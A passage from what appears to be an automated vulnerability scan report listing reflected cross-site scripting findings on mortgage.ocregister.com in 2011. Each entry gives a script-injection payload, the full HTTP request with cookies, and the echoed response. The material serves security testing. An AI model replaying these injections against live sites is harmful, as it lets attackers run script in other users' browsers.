The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81705"><script>alert(1)</script>5be155ad2e1 was submitted in the cat parameter. This input was echoed as 81705\"><script>alert(1)</script>5be155ad2e1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?cat=81705"><script>alert(1)</script>5be155ad2e1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:08:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:08:57 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62649

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/?cat=81705\"><script>alert(1)</script>5be155ad2e1feed/" />
...[SNIP]...

1.209. http://mortgage.ocregister.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9060"><script>alert(1)</script>27ab659d801 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d9060\"><script>alert(1)</script>27ab659d801 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?d9060"><script>alert(1)</script>27ab659d801=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:08:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 99645

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/?d9060\"><script>alert(1)</script>27ab659d801=1feed/" />
...[SNIP]...

1.210. http://mortgage.ocregister.com/2007/02/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/02/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52dcb"><script>alert(1)</script>39ced908d26 was submitted in the REST URL parameter 1. This input was echoed as 52dcb\"><script>alert(1)</script>39ced908d26 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /200752dcb"><script>alert(1)</script>39ced908d26/02/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:55 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/200752dcb\"><script>alert(1)</script>39ced908d26/02/feed/" />
...[SNIP]...

1.211. http://mortgage.ocregister.com/2007/02/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/02/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b0a6"><script>alert(1)</script>92197aa8e9d was submitted in the REST URL parameter 2. This input was echoed as 6b0a6\"><script>alert(1)</script>92197aa8e9d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2007/026b0a6"><script>alert(1)</script>92197aa8e9d/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:15:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:15:06 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/026b0a6\"><script>alert(1)</script>92197aa8e9d/feed/" />
...[SNIP]...

1.212. http://mortgage.ocregister.com/2007/02/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/02/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3653d"><script>alert(1)</script>5061bfdeb82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3653d\"><script>alert(1)</script>5061bfdeb82 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2007/02/?3653d"><script>alert(1)</script>5061bfdeb82=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 82182

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2007 February - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/02/?3653d\"><script>alert(1)</script>5061bfdeb82=1feed/" />
...[SNIP]...

1.213. http://mortgage.ocregister.com/2007/03/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/03/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b96d6"><script>alert(1)</script>608b7c95f14 was submitted in the REST URL parameter 1. This input was echoed as b96d6\"><script>alert(1)</script>608b7c95f14 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2007b96d6"><script>alert(1)</script>608b7c95f14/03/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:46 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007b96d6\"><script>alert(1)</script>608b7c95f14/03/feed/" />
...[SNIP]...

1.214. http://mortgage.ocregister.com/2007/03/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/03/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 832cb"><script>alert(1)</script>2b5aea2aeb2 was submitted in the REST URL parameter 2. This input was echoed as 832cb\"><script>alert(1)</script>2b5aea2aeb2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2007/03832cb"><script>alert(1)</script>2b5aea2aeb2/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:52 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/03832cb\"><script>alert(1)</script>2b5aea2aeb2/feed/" />
...[SNIP]...

1.215. http://mortgage.ocregister.com/2007/03/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/03/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10aad"><script>alert(1)</script>8ad5229eab7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 10aad\"><script>alert(1)</script>8ad5229eab7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2007/03/?10aad"><script>alert(1)</script>8ad5229eab7=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86849

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2007 March - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/03/?10aad\"><script>alert(1)</script>8ad5229eab7=1feed/" />
...[SNIP]...

1.216. http://mortgage.ocregister.com/2007/04/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/04/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55996"><script>alert(1)</script>f21c39f9bf3 was submitted in the REST URL parameter 1. This input was echoed as 55996\"><script>alert(1)</script>f21c39f9bf3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /200755996"><script>alert(1)</script>f21c39f9bf3/04/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:44 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/200755996\"><script>alert(1)</script>f21c39f9bf3/04/feed/" />
...[SNIP]...

1.217. http://mortgage.ocregister.com/2007/04/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/04/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96ffb"><script>alert(1)</script>43052a33670 was submitted in the REST URL parameter 2. This input was echoed as 96ffb\"><script>alert(1)</script>43052a33670 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2007/0496ffb"><script>alert(1)</script>43052a33670/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:47 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/0496ffb\"><script>alert(1)</script>43052a33670/feed/" />
...[SNIP]...

1.218. http://mortgage.ocregister.com/2007/04/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/04/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74dd0"><script>alert(1)</script>2eca39d79aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 74dd0\"><script>alert(1)</script>2eca39d79aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2007/04/?74dd0"><script>alert(1)</script>2eca39d79aa=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86567

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2007 April - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/04/?74dd0\"><script>alert(1)</script>2eca39d79aa=1feed/" />
...[SNIP]...

1.219. http://mortgage.ocregister.com/2007/05/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/05/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a5d1"><script>alert(1)</script>84bac8fb2df was submitted in the REST URL parameter 1. This input was echoed as 7a5d1\"><script>alert(1)</script>84bac8fb2df in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /20077a5d1"><script>alert(1)</script>84bac8fb2df/05/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:50 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20077a5d1\"><script>alert(1)</script>84bac8fb2df/05/feed/" />
...[SNIP]...

1.220. http://mortgage.ocregister.com/2007/05/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/05/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5186"><script>alert(1)</script>5f95e6db221 was submitted in the REST URL parameter 2. This input was echoed as e5186\"><script>alert(1)</script>5f95e6db221 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2007/05e5186"><script>alert(1)</script>5f95e6db221/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:15:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:15:04 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/05e5186\"><script>alert(1)</script>5f95e6db221/feed/" />
...[SNIP]...

1.221. http://mortgage.ocregister.com/2007/05/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/05/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb37e"><script>alert(1)</script>c34013ed727 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cb37e\"><script>alert(1)</script>c34013ed727 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2007/05/?cb37e"><script>alert(1)</script>c34013ed727=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 83696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2007 May - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/05/?cb37e\"><script>alert(1)</script>c34013ed727=1feed/" />
...[SNIP]...

1.222. http://mortgage.ocregister.com/2007/06/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/06/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d840"><script>alert(1)</script>d1f9139be71 was submitted in the REST URL parameter 1. This input was echoed as 4d840\"><script>alert(1)</script>d1f9139be71 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /20074d840"><script>alert(1)</script>d1f9139be71/06/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
